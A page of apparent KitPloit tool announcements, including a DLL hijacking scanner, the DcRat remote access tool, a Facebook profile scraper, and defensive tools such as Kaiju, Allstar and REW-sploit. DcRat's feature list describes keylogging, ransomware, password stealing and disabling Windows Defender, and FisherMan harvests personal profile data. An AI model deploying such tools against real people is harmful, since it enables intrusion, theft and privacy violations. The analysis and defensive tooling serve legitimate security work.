๐Ÿ”’
There are new articles available, click to refresh the page.
Before yesterdayKitPloit - PenTest & Hacking Tools

DLLHSC - DLL Hijack SCanner A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking

15 March 2021 at 11:30
By: Zion3R


DLL Hijack SCanner - A tool to generate leads and automate the discovery of candidates for DLL Search Order Hijacking


Contents of this repository

This repository hosts the Visual Studio project file for the tool (DLLHSC), the project file for the API hooking functionality (detour), the project file for the payload and last but not least the compiled executables for x86 and x64 architecture (in the release section of this repo). The code was written and compiled with Visual Studio Community 2019.

If you choose to compile the tool from source, you will need to compile the projects DLLHSC, detour and payload. The DLLHSC implements the core functionality of this tool. The detour project generates a DLL that is used to hook APIs. And the payload project generates the DLL that is used as a proof of concept to check if the tested executable can load it via search order hijacking. The generated payload has to be placed in the same directory with DLLHSC and detour named payload32.dll for x86 and payload64.dll for x64 architecture.


Modes of operation

The tool implements 3 modes of operation which are explained below.


Lightweight Mode

Loads the executable image in memory, parses the Import table and then replaces any DLL referred in the Import table with a payload DLL.

The tool places in the application directory only a module (DLL) the is not present in the application directory, does not belong to WinSxS and does not belong to the KnownDLLs.

The payload DLL upon execution, creates a file in the following path: C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp as a proof of execution. The tool launches the application and reports if the payload DLL was executed by checking if the temporary file exists. As some executables import functions from the DLLs they load, error message boxes may be shown up when the provided DLL fails to export these functions and thus meet the dependencies of the provided image. However, the message boxes indicate the DLL may be a good candidate for payload execution if the dependencies are met. In this case, additional analysis is required. The title of these message boxes may contain the strings: Ordinal Not Found or Entry Point Not Found. DLLHSC looks for windows that contain these strings, closes them as soon as they shown up and reports the results.


List Modules Mode

Creates a process with the provided executable image, enumerates the modules that are loaded in the address space of this process and reports the results after applying filters.

The tool only reports the modules loaded from the System directory and do not belong to the KnownDLLs. The results are leads that require additional analysis. The analyst can then place the reported modules in the application directory and check if the application loads the provided module instead.


Run-Time Mode

Hooks the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours and reports the modules that are loaded in run-time.

Each time the scanned application calls LoadLibrary and LoadLibraryEx, the tool intercepts the call and writes the requested module in the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp. If the LoadLibraryEx is specifically called with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, no output is written to the file. After all interceptions have finished, the tool reads the file and prints the results. Of interest for further analysis are modules that do not exist in the KnownDLLs registry key, modules that do not exist in the System directory and modules with no full path (for these modules loader applies the normal search order).


Compile and Run Guidance

Should you choose to compile the tool from source it is recommended to do so on Visual Code Studio 2019. In order the tool to function properly, the projects DLLHSC, detour and payload have to be compiled for the same architecture and then placed in the same directory. Please note that the DLL generated from the project payload has to be renamed to payload32.dll for 32-bit architecture or payload64.dll for 64-bit architecture.


Help menu

The help menu for this application

NAME
dllhsc - DLL Hijack SCanner

SYNOPSIS
dllhsc.exe -h

dllhsc.exe -e <executable image path> (-l|-lm|-rt) [-t seconds]

DESCRIPTION
DLLHSC scans a given executable image for DLL Hijacking and reports the results

It requires elevated privileges

OPTIONS
-h, --help
display this help menu and exit

-e, --executable-image
executable image to scan

-l, --lightweight
parse the import table, attempt to launch a payload and report the results

-lm, --list-modules
list loaded modules that do not exist in the application's directory

-rt, --runtime-load
display modules loaded in run-time by hooking LoadLibrary and LoadLibraryEx APIs

-t, --timeout
number of seconds to wait f or checking any popup error windows - defaults to 10 seconds


Example Runs

This section provides examples on how you can run DLLHSC and the results it reports. For this purpose, the legitimate Microsoft utility OleView.exe (MD5: D1E6767900C85535F300E08D76AAC9AB) was used. For better results, it is recommended that the provided executable image is scanned within its installation directory.

The flag -l parses the import table of the provided executable, applies filters and attempts to weaponize the imported modules by placing a payload DLL in the application's current directory. The scanned executable may pop an error box when dependencies for the payload DLL (exported functions) are not met. In this case, an error message box is poped. DLLHSC by default checks for 10 seconds if a message box was opened or for as many seconds as specified by the user with the flag -t. An error message box indicates that if dependencies are met, the module can be weaponized.

The following screenshot shows the error message box generated when OleView.dll loads the payload DLL :



The tool waits for a maximum timeframe of 10 seconds or -t seconds to make sure the process initialization has finished and any message box has been generated. It then detects the message box, closes it and reports the result:



The flag -lm launches the provided executable and prints the modules it loads that do not belong in the KnownDLLs list neither are WinSxS dependencies. This mode is aimed to give an idea of DLLs that may be used as payload and it only exists to generate leads for the analyst.



The flag -rt prints the modules the provided executable image loads in its address space when launched as a process. This is achieved by hooking the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours.



Feedback

For any feedback on this tool, please use the GitHub Issues section.



Retoolkit - Reverse Engineer's Toolkit

26 March 2021 at 11:30
By: Zion3R


This is a collection of tools you may like if you are interested on reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder in your desktop with shortcuts to RE tools like these:


Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


Download

The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.


Included tools

Check the wiki.



Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.


Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribuite the software, please file a request here.



Php_Code_Analysis - San your PHP code for vulnerabilities


This script will scan your code

the script can find

  1. check_file_upload issues
  2. host_header_injection
  3. SQl injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

features
  1. fast
  2. simple report

usage:
python code.py <file name> >>> this will scan one file
python code.py >>> this will scan full folder (.)
python code.py <path> >>> scan full folder

Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite


CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since some significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to utilize new branding such that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET causing many more unintended collisions). As such, analytical results may vary between this plugin and Pharos fn2hash.


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding with your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputing the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file as example.exe.Hashes.csv.

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

Alternately to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or can not be set, you can also specify it on the command like with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to run the update command whenever you pull the latest Kaiju source code, to ensure they stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process now can auto-remove previous installs of Kaiju if you enable this feature. To enable the autoremove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as (assuming the environment variable is probably set as in previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju


DcRat - A Simple Remote Tool Written In C#

12 July 2021 at 21:30
By: Zion3R


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and security
  • Server IP port can be archived through link
  • Multi-Server,multi-port support
  • Plugin system through Dll, which has strong expansibility
  • Super tiny client size (about 40~50K)
  • Data transform with msgpack (better than JSON and other formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDOS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass Uac
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build๏ผšvs2019
  • Runtime๏ผš
Project Runtime
Server .NET Framework 4.61
Client and others .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealer (only chrome and edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun function
  • Information Collection(Maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • โ€ฆโ€ฆ

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the lastest release.


Attention

ๆˆ‘๏ผˆ็ฐž็ด”๏ผ‰ๅฏนๆ‚จ็”ฑไฝฟ็”จๆˆ–ไผ ๆ’ญ็ญ‰็”ฑๆญค่ฝฏไปถๅผ•่ตท็š„ไปปไฝ•่กŒไธบๅ’Œ/ๆˆ–ๆŸๅฎณไธๆ‰ฟๆ‹…ไปปไฝ•่ดฃไปปใ€‚ๆ‚จๅฏนไฝฟ็”จๆญค่ฝฏไปถ็š„ไปปไฝ•่กŒไธบๆ‰ฟๆ‹…ๅ…จ้ƒจ่ดฃไปป๏ผŒๅนถๆ‰ฟ่ฎคๆญค่ฝฏไปถไป…็”จไบŽๆ•™่‚ฒๅ’Œ็ ”็ฉถ็›ฎ็š„ใ€‚ไธ‹่ฝฝๆœฌ่ฝฏไปถๆˆ–่ฝฏไปถ็š„ๆบไปฃ็ ๏ผŒๆ‚จ่‡ชๅŠจๅŒๆ„ไธŠ่ฟฐๅ†…ๅฎนใ€‚
I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you will automatically agree with the above content.


Thanks


Jsleak - A Go Code To Detect Leaks In JS Files Via Regex Patterns

18 August 2021 at 21:30
By: Zion3R


jsleak is a tool to identify sensitive data in JS files through regex patterns. Although it's built for this, you can use it to identify anything as long as you have a regex pattern for it.


How to install

Directly:

{your package manager} install pkg-config libpcre++-dev
go get github.com/0xTeles/jsleak/v2/jsleak

Compiled: release page


How to use
Usage of jsleak:
-json string
[+] Json output file
-pattern string
[+] File contains patterns to test
-verbose
[+] Verbose Mode

Demo
cat urls.txt | jsleak -pattern regex.txt
[+] Url: http://localhost/index.js
[+] Pattern: p([a-z]+)ch
[+] Match: peach

To Do
  • Fix output
  • Add more patterns
  • Add stdin
  • Implement JSON input
  • Fix patterns
  • Implement PCRE

Regex list

Inspired by

Thanks

@fepame, @gustavorobertux, @Jhounx, @arthurair_es



Allstar - GitHub App To Set And Enforce Security Policies

19 August 2021 at 12:30
By: Zion3R


Allstar is a GitHub App installed on organizations or repositories to set and enforce security policies. Its goal is to be able to continuously monitor and detect any GitHub setting or repository file contents that may be risky or do not follow security best practices. If Allstar finds a repository to be out of compliance, it will take an action such as create an issue or restore security settings.

The specific policies are intended to be highly configurable, to try to meet the needs of different project communities and organizations. Also, developing and contributing new policies is intended to be easy.

Allstar is developed under the OpenSSF organization, as a part of the Securing Critical Projects Working Group. The OpenSSF runs an instance of Allstar here for anyone to install and use on their GitHub organizations. However, Allstar can be run by anyone if need be, see the operator docs for more details.


Quick start

Install Allstar GitHub App on your organizations and repositories. When installing Allstar, you may review the permissions requested. Allstar asks for read access to most settings and file contents to detect security compliance. It requests write access to issues to create issues, and to checks to allow the block action.

Follow the quick start instructions to setup the configuration files needed to enable Allstar on your repositories. For more details on advanced configuration, see below.


Help! I'm getting issues created by Allstar and I don't want them.

Enable Configuration

Allstar can be enabled on individual repositories at the app level, with the option of enabling or disabling each security policy individually. For organization-level configuration, create a repository named .allstar in your organization. Then create a file called allstar.yaml in that repository.

Allstar can either be set to an opt-in or opt-out strategy. In opt-in, only those repositories explicitly listed are enabled. In opt-out, all repositories are enabled, and repositories would need to be explicitly added to opt-out. Allstar is set to opt-in by default, and therefore is not enabled on any repository immediately after installation. To continue with the default opt-in strategy, list the repositories for Allstar to be enabled on in your organization like so:

optConfig:
optInRepos:
- repo-one
- repo-two

To switch to the opt-out strategy (recommended), set that option to true:

optConfig:
optOutStrategy: true

If you wish to enable Allstar on all but a few repositories, you may use opt-out and list the repositories to disable:

optConfig:
optOutStrategy: true
optOutRepos:
- repo-one
- repo-two

Repository Override

Individual repositories can also opt in or out using configuration files inside those repositories. For example, if the organization is configured with the opt-out strategy, a repository may opt itself out by including the file .allstar/allstar.yaml with the contents:

optConfig:
optOut: true

Conversely, this allows repositories to opt-in and enable Allstar when the organization is configured with the opt-in strategy. Because opt-in is the default strategy, this is how Allstar works if the .allstar repository doesn't exist.

At the organization-level allstar.yaml, repository override may be disabled with the setting:

optConfig:
disableRepoOverride: true

This allows an organization-owner to have a central point of approval for repositories to request an opt-out through a GitHub PR. Understandably, Allstar or individual policies may not make sense for all repositories.


Policy Enable

Each individual policy configuration file (see below) also contains the exact same optConfig configuration object. This allows granularity to enable policies on individual repositories. A policy will not take action unless it is enabled and Allstar is enabled as a whole.


Definition

Actions

Each policy can be configured with an action that Allstar will take when it detects a repository to be out of compliance.

  • log: This is the default action, and actually takes place for all actions. All policy run results and details are logged. Logs are currently only visible to the app operator, plans to expose these are under discussion.
  • issue: This action creates a GitHub issue. Only one issue is created per policy, and the text describes the details of the policy violation. If the issue is already open, it is pinged with a comment every 24 hours (not currently user configurable). Once the violation is addressed, the issue will be automatically closed by Allstar within 5-10 minutes.
  • fix: This action is policy specific. The policy will make the changes to the GitHub settings to correct the policy violation. Not all policies will be able to support this (see below).

Proposed, but not yet implemented actions. Definitions will be added in the future.

  • block: Allstar can set a GitHub Status Check and block any PR in the repository from being merged if the check fails.
  • email: Allstar would send an email to the repository administrator(s).
  • rpc: Allstar would send an rpc to some organization-specific system.

Policies

Similar to the Allstar app enable configuration, all policies are enabled and configured with a yaml file in either the organization's .allstar repository, or the repository's .allstar directory. As with the app, policies are opt-in by default, also the default log action won't produce visible results. A simple way to enable all policies is to create a yaml file for each policy with the contents:

optConfig:
optOutStrategy: true
action: issue

The fix action is not implemented in any policy yet, but will be implemented in those policies where it is applicable soon.


Branch Protection

This policy's config file is named branch_protection.yaml, and the config definitions are here.

The branch protection policy checks that GitHub's branch protection settings are setup correctly according to the specified configuration. The issue text will describe which setting is incorrect. See GitHub's documentation for correcting settings.


Binary Artifacts

This policy's config file is named binary_artifacts.yaml, and the config definitions are here.

This policy incorporates the check from scorecard. Remove the binary artifact from the repository to achieve compliance. As the scorecard results can be verbose, you may need to run scorecard itself to see all the detailed information.


Outside Collaborators

This policy's config file is named outside.yaml, and the config definitions are here.

This policy checks if any Outside Collaborators have either administrator(default) or push(optional) access to the repository. Only organization members should have this access, as otherwise untrusted members can change admin level settings and commit malicious code.


SECURITY.md

This policy's config file is named security.yaml, and the config definitions are here.

This policy checks that the repository has a security policy file in SECURITY.md and that it is not empty. The created issue will have a link to the GitHub tab that helps you commit a security policy to your repository.


Future Policies

Example Config Repository

See this repo as an example of Allstar config being used. As the organization administrator, consider a README.md with some information on how Allstar is being used in your organization.


Contribute Policies

Interface definition.

Both the SECURITY.md and Outside Collaborators policies are quite simple to understand and good examples to copy.



REW-sploit - Emulate And Dissect MSF And *Other* Attacks

19 August 2021 at 21:30
By: Zion3R


REW-sploit

The tool has been presented at Black-Hat Arsenal USA 2021

https://www.blackhat.com/us-21/arsenal/schedule/index.html#rew-sploit-dissecting-metasploit-attacks-24086

Slides of presentation are available at https://github.com/REW-sploit/REW-sploit_docs


Need help in analyzing Windows shellcode or attack coming from Metasploit Framework or Cobalt Strike (or may be also other malicious or obfuscated code)? Do you need to automate tasks with simple scripting? Do you want help to decrypt MSF generated traffic by extracting keys from payloads?

REW-sploit is here to help Blue Teams!

Here a quick demo:


Install

Installation is very easy. I strongly suggest to create a specific Python Env for it:

# python -m venv <your-env-path>/rew-sploit
# source <your-env-path>/bin/activate
# git clone https://github.com/REW-sploit/REW-sploit.git
# cd REW-sploit
# pip install -r requirements.txt
# ./apply_patch.py -f
# ./rew-sploit

If you prefer, you can use the Dockerfile. To create the image:

docker build -t rew-sploit/rew-sploit .

and then start it (sharing the /tmp/ folder):

docker run --rm -it --name rew-sploit -v /tmp:/tmp rew-sploit/rew-sploit

You see an apply_patch.py script in the installation sequence. This is required to apply a small patch to the speakeasy-emulator (https://github.com/fireeye/speakeasy/) to make it compatible with REW-sploit. You can easily revert the patch with ./apply_patch.py -r if required.

Optionally, you can also install Cobalt-Strike Parser:

# cd REW-sploit/extras
# git clone https://github.com/Sentinel-One/CobaltStrikeParser.git

Standing on the shoulder of giants

REW-sploit is based on a couple of great frameworks, Unicorn and speakeasy-emulator (but also other libraries). Thanks to everyone and thanks to the OSS movement!


How it works

In general we can say that whilst Red Teams have a lot of tools helping them in "automating" attacks, Blue Teams are a bit "tool-less". So, what I thought is to build something to help Blue Team Analysis.

REW-sploit can get a shellcode/DLL/EXE, emulate the execution, and give you a set of information to help you in understanding what is going on. Example of extracted information are:

You can find several examples on the current capabilities here below:


Fixups

In some cases emulation was simply breaking, for different reasons. In some cases obfuscation was using some techniques that was confusing the emulation engine. So I implemented some ad-hoc fixups (you can enable them by using -F option of the emulate_payload command). Fixups are implemented in modules/emulate_fixups.py. Currently we have

Unicorn issue #1092:

    #
# Fixup #1
# Unicorn issue #1092 (XOR instruction executed twice)
# https://github.com/unicorn-engine/unicorn/issues/1092
# #820 (Incorrect memory view after running self-modifying code)
# https://github.com/unicorn-engine/unicorn/issues/820
# Issue: self modfying code in the same Translated Block (16 bytes?)
# Yes, I know...this is a huge kludge... :-/
#

FPU emulation issue:

    #
# Fixup #2
# The "fpu" related instructions (FPU/FNSTENV), used to recover EIP, sometimes
# returns the wrong addresses.
# In this case, I need to track the first FPU instruction and then place
# its address in STACK when FNSTENV is called
#

Trap Flag evasion:

    #
# Fixup #3
# Trap Flag evasion technique
# https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/
#
# The call of the RDTSC with the trap flag enabled, cause an unhandled
# interrupt. Example code:
# pushf
# or dword [esp], 0x100
# popf
# rdtsc
#
# Any call to RDTSC with Trap Flag set will be intercepted and TF will
# be cleared
#

Customize YARA rules

File modules/emulate_rules.py contains the YARA rules used to intercept the interesting part of the code, in order to implement instrumentation. I tried to comment as much as possible these sections in order to let you create your own rule (please share them with a pull request if you think they can help others). For example:

#
# Payload Name: [MSF] windows/meterpreter/reverse_tcp_rc4
# Search for : mov esi,dword ptr [esi]
# xor esi,0x<const>
# Used for : this xor instruction contains the constant used to
# encrypt the lenght of the payload that will be sent as 2nd
# stage
# Architecture: x32
#
yara_reverse_tcp_rc4_xor_32 = 'rule reverse_tcp_rc4_xor { \
strings: \
$opcodes_1 = { 8b 36 \
81 f6 ?? ?? ?? ?? } \
condition: \
$opcodes_1 }'

Issues

Please, open Issues if you find something that not work or that can be improved. Thanks!



FisherMan - CLI Program That Collects Information From Facebook User Profiles Via Selenium

20 August 2021 at 12:30
By: Zion3R


Search for public profile information on Facebook


Installation
# clone the repo
$ git clone https://github.com/Godofcoffe/FisherMan

# change the working directory to FisherMan
$ cd FisherMan

# install the requirements
$ python3 -m pip install -r requirements.txt

Pre-requisites
  • Make sure you have the executable "geckodriver" installed on your machine.

Usage
facebook profiles. (Version 3.4.0) optional arguments: -h, --help show this help message and exit --version Shows the current version of the program. -u USERNAME [USERNAME ...], --username USERNAME [USERNAME ...] Defines one or more users for the search. -i ID [ID ...], --id ID [ID ...] Set the profile identification number. --use-txt TXT_FILE Replaces the USERNAME parameter with a user list in a txt. -S USER, --search USER It does a shallow search for the username. Replace the spaces with '.'(period). -sf, --scrape-family If this parameter is passed, the information from family members will be scraped if available. --specify {0,1,2,3,4,5} [{0,1,2,3,4,5} ...] Use the index number to return a specific part of the page. about: 0,about_contact_and_basic_info: 1,about_family_and_relationships: 2,about_details: 3,about_work_and_education: 4,about_places: 5. -s, --several Returns extra data like profile picture, number of followers and friends. -b, --browser Opens the browser/bot. --email EMAIL If the profile is blocked, you can define your account, however you have the search user in your friends list. --password PASSWORD Set the password for your facebook account, this parameter has to be used with --email. -o, --file-output Save the output data to a .txt file. -c, --compact Compress all .txt files. Use together with -o. -v, -d, --verbose, --debug It shows in detail the data search process. -q, --quiet Eliminates and simplifies some script outputs for a simpler and more discrete visualization. ">
$ python3 fisherman.py --help
usage: fisherman.py [-h] [--version] [-u USERNAME [USERNAME ...] | -i ID
[ID ...] | --use-txt TXT_FILE | -S USER] [-sf]
[--specify {0,1,2,3,4,5} [{0,1,2,3,4,5} ...]] [-s] [-b]
[--email EMAIL] [--password PASSWORD] [-o] [-c] [-v | -q]

FisherMan: Extract information from facebook profiles. (Version 3.4.0)

optional arguments:
-h, --help show this help message and exit
--version Shows the current version of the program.
-u USERNAME [USERNAME ...], --username USERNAME [USERNAME ...]
Defines one or more users for the search.
